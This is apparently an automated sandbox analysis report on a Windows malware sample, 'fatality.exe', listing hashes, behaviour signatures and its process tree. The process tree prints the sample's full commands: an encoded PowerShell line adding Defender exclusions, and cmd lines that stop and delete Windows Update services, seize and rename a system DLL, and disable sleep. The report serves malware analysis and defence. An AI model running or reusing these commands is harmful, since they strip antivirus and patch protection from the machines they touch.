Analysis

  • max time kernel
    21s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2022 16:52

General

  • Target

    fatality.exe

  • Size

    4.4MB

  • MD5

    96730495621816d6e5082a95574bd9d5

  • SHA1

    b62168945da2966f4c4122f49df0e0ba5751ec0a

  • SHA256

    e7ea0aaed1c2dea3cda5661fd66693909f63f1978bf07d25d90e6a5cfd310ef0

  • SHA512

    a7ea21f0b8501ea0e00b6f01c6b2ea433f34129e1379e5ba877d81d1be15e9c128c3b4c7f911241ca82d14dbd8aacaf0f03d919a77826074c0ce2f57216d80b1

  • SSDEEP

    98304:hU4R+GsvqbiXke/i06xLTDqGg9hGzkI5GYsgd1N9RZxxlgu:uOmvqbiU0iDZTDI9AzkI56gdz9RXL

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fatality.exe
    "C:\Users\Admin\AppData\Local\Temp\fatality.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBzAGYAdQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGUAIwA+AA=="
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1992
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1116
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:544
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1420
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:1820
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1688
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1872
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:2040
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:840
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:1724
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:1132
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:452
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:884
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1124
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1028
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1168
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1208

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/452-81-0x0000000000000000-mapping.dmp
  • memory/544-69-0x0000000000000000-mapping.dmp
  • memory/840-78-0x0000000000000000-mapping.dmp
  • memory/884-82-0x0000000000000000-mapping.dmp
  • memory/1028-71-0x0000000000000000-mapping.dmp
  • memory/1116-67-0x0000000000000000-mapping.dmp
  • memory/1124-68-0x0000000000000000-mapping.dmp
  • memory/1132-80-0x0000000000000000-mapping.dmp
  • memory/1168-74-0x0000000000000000-mapping.dmp
  • memory/1208-76-0x0000000000000000-mapping.dmp
  • memory/1420-70-0x0000000000000000-mapping.dmp
  • memory/1440-66-0x0000000000000000-mapping.dmp
  • memory/1476-65-0x0000000000000000-mapping.dmp
  • memory/1688-73-0x0000000000000000-mapping.dmp
  • memory/1724-79-0x0000000000000000-mapping.dmp
  • memory/1820-72-0x0000000000000000-mapping.dmp
  • memory/1872-75-0x0000000000000000-mapping.dmp
  • memory/1992-64-0x000000000258B000-0x00000000025AA000-memory.dmp
    Filesize

    124KB

  • memory/1992-63-0x0000000002584000-0x0000000002587000-memory.dmp
    Filesize

    12KB

  • memory/1992-62-0x000000000258B000-0x00000000025AA000-memory.dmp
    Filesize

    124KB

  • memory/1992-61-0x000000001B730000-0x000000001BA2F000-memory.dmp
    Filesize

    3.0MB

  • memory/1992-59-0x000007FEECEB0000-0x000007FEEDA0D000-memory.dmp
    Filesize

    11.4MB

  • memory/1992-60-0x0000000002584000-0x0000000002587000-memory.dmp
    Filesize

    12KB

  • memory/1992-58-0x000007FEEDA10000-0x000007FEEE433000-memory.dmp
    Filesize

    10.1MB

  • memory/1992-56-0x0000000000000000-mapping.dmp
  • memory/2012-54-0x000000013FA70000-0x000000013FED0000-memory.dmp
    Filesize

    4.4MB

  • memory/2012-55-0x000007FEFC371000-0x000007FEFC373000-memory.dmp
    Filesize

    8KB

  • memory/2040-77-0x0000000000000000-mapping.dmp